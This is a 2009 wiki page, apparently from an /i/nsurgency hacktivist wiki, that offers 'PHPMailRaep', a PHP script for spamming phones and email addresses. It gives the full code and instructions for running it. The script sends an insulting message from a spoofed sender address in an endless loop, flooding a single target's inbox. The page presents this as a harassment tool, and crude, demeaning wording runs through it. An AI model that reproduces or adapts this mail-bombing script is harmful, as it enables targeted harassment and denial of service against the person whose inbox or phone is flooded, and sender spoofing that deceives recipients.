PHPMailRaep: Difference between revisions
From /i/nsurgency W/i/ki
Jump to navigationJump to search
>Janus zeal No edit summary |
>Janus zeal m moved SMSRaep to PHPMailRaep |
| (One intermediate revision by the same user not shown) | |
(No difference)
| |
Latest revision as of 23:18, 6 March 2009
PHPMailRaep is a simple script to spam phones and email addresses.
Code[edit]
<?php
// Simple PHPMailRaep by janus zeal
// irc.netchan.org #insurgency
$to = "email address";
$subject = "asshole of the year";
$message = "haha";
$from = "pedrobear@internet.br";
// From address doesn't have to be valid, but it should look like a real email
// Don't edit below here
$count = 0;
$headers = "From: $from";
while (1) {
$count++;
mail($to,$subject,$message,$headers);
print "Message sent, Now @ " . $count . "\n";
}
?>
Use[edit]
Run from the nix command line, sendmail and php-cgi are required.
php-cgi mail.php
Ctrl-c to exit (Not pretty, I know. :\)